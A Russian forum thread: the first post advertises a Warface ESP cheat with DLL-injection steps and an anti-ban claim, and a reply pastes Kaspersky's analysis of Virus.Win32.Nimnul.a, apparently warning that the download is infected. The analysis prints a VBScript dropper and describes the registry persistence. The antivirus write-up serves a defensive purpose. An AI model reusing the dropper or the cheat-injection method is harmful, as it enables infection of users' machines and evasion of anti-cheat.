1. Привет Гость, в нашем магазине проходит акция! Смотри эту тему.
    Так же цена на VIP снижена!

HOT [26.05.15][WF] LittleEngine by DiVa (Все виды ESP)

Тема в разделе "Читы для Warface", создана пользователем HardWell, 26 май 2015.

Статус темы:
Закрыта.
  1. Оффлайн

    HardWell

    130
    200
    180
    Всем привет.
    Представляю вашему внимаю LittleEngine от компании DiVa™ version 0.4.6 By VALKOI.
    Обновил весь функционал.
    Особенности:
    - Удобен в использовании
    - Красивый дизайн
    - Автоматический переход на сайт
    - Язык сделал Английский скоро будет выбор языков
    - Новая система анти-бана(не банит!)
    - ESP

    [​IMG]
    [​IMG]
    1) Скачать
    2) Розпаковать
    3) Запустить Игру
    4) На выборе PVP/PVE запустить Инжектор
    5) Выбрать нашь длл (dxhook.dll)
    6) Нажать Start
    7) Меню активировать на (HOME)


    download+
    virus total

     
    Последнее редактирование: 26 май 2015
  2.  
  3. Оффлайн

    костя06117909 кошак

    33
    1
    3
  4. Оффлайн

    костя06117909 кошак

    33
    1
    3
    Технические детали
    Вредоносная программа, заражающая файлы на компьютере пользователя, и предоставляющая злоумышленнику удаленный доступ к зараженной машине. Является приложением Windows (PE-EXE файл). Имеет размер 62464 байта. Упакована UPX и неизвестным упаковщиком. Распакованный размер – около 75 КБ. Написана на C++.


    Распространение

    Копия вредоноса создается на всех доступных для записи съемных дисках, подключаемых к зараженному компьютеру, в каталоге:

    <имя зараженного диска>:\Recycler

    Также в корне диска создается файл
    <имя зараженного диска>:\autorun.inf

    обеспечивающий вредоносу возможность запускаться каждый раз, когда пользователь открывает зараженный раздел при помощи программы "Проводник".


    Нагрузка
    После запуска вредонос для контроля уникальности своего процесса в системе создает уникальный идентификатор с именем:

    KyUffThOkYwRRtgPP

    Также проверяется имя исполняемого файла вредоноса. Если имя отлично от "DesktopLayer.exe", тело вредоноса копируется в файл:
    %Program Files%\Microsoft\DesktopLayer.exe

    после чего, запускается на выполнение. Также каталог "Microsoft", содержащий копию вредоноса, может создаваться в каталогах:
    %HOMEDRIVE%
    %HOMEPATH%
    %APPDATA%
    %System%
    %WinDir%
    %Temp%


    После запуска вредонос запускает браузер, установленный в системе по умолчанию, и внедряет в адресное пространство его процесса исполняемый код, реализующий весь деструктивный функционал. Внедряемый код реализует выполнение следующих действий:
    • для автоматического запуска созданной ранее копии вредоноса изменяется значение ключа системного реестра:
      [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
      "Userinit" = "%System%\userinit.exe,,%Program Files%\microsoft\
      desktoplayer.exe"

      Таким образом, копия будет запускаться процессом "WINLOGON.EXE" даже при запуске компьютера в "безопасном режиме".
    • Предотвращается модификация ключа автозапуска реестра, а также файла "DesktopLayer.exe".
    • Заражаются файлы с расширениями:
      htm
      dll
      exe


      При заражении EXE и DLL файлов тело вируса дописывается в конец последней PE-секции целевого файла. При этом точка входа в программу изменяется таким образом, чтобы вирусное тело получало управление первым. HTM файлы заражаются путем дописывания в конец целевого файла скрипта следующего содержания:
      <SCRIPT Language=VBScript><!--
      DropFileName = "svchost.exe"
      WriteData = "4D5A… (тело вредоноса)"
      Set FSO = CreateObject("Scripting.FileSystemObject")
      DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
      If FSO.FileExists(DropPath)=False Then
      Set FileObj = FSO.CreateTextFile(DropPath, True)
      For i = 1 To Len(WriteData) Step 2
      FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
      Next
      FileObj.Close
      End If
      Set WSHshell = CreateObject("WScript.Shell")
      WSHshell.Run DropPath, 0
      //--></SCRIPT>


      Таким образом, при каждом запуске скрипта в каталоге хранения временных файлов текущего пользователя будет создаваться и запускаться на выполнение копия вредоноса:
      %Temp%\svchost.exe

      Зараженные HTML-страницы детектируются Антивирусом Касперского как "Trojan-Dropper.VBS.Agent.bp".
    • В рабочем каталоге исполняемого файла браузера создается конфигурационный файл "dmlconf.dat".
    • Для получения команд устанавливается соединение с сервером:
      fget-ca***r.com

      По полученной от злоумышленника команде вредонос может выполнять следующие действия:
      • загружать на зараженный компьютер файлы и запускать их на выполнение.
      • соединяться с другим сервером для получения команд.


    Инструкции по удалению
    Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

    1. При помощи Диспетчера задач завершить процесс установленного по умолчанию браузера.
    2. Восстановить значение ключа системного реестра (как работать с реестром?):
      [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
      "Userinit" = "userinit.exe"

    3. Удалить файлы:
      %Program Files%\Microsoft\DesktopLayer.exe
      %Temp%\svchost.exe
      <имя зараженного диска>:\Recycler
      <имя зараженного диска>:\autorun.inf

    4. Удалить оригинальный файл вредоноса (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
    5. Не запускать EXE, HTM файлы и не перезагружать компьютер до полной проверки зараженного компьютера антивирусом.
    6. Очистить каталог Temporary Internet Files, который может содержать инфицированные файлы (Как удалить инфицированные файлы в папке Temporary Internet Files?).
    7. Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).


    Virus.Win32.Nimnul.a
    ЗАО «Лаборатория Касперского».
    Все права защищены. Зарегистрированные товарные знаки и знаки обслуживания являются собственностью их правообладателей.

    Связаться с нами | Политика конфиденциальности
     
Статус темы:
Закрыта.

Поделиться этой страницей

Уважаемый пользователь!

Мы обнаружили, что вы блокируете показ рекламы на нашем сайте.

Просим внести его в список исключения или отключить AdBlock.

Наши материалы предоставляются БЕСПЛАТНО и единственным доходом является реклама.

Спасибо за понимание!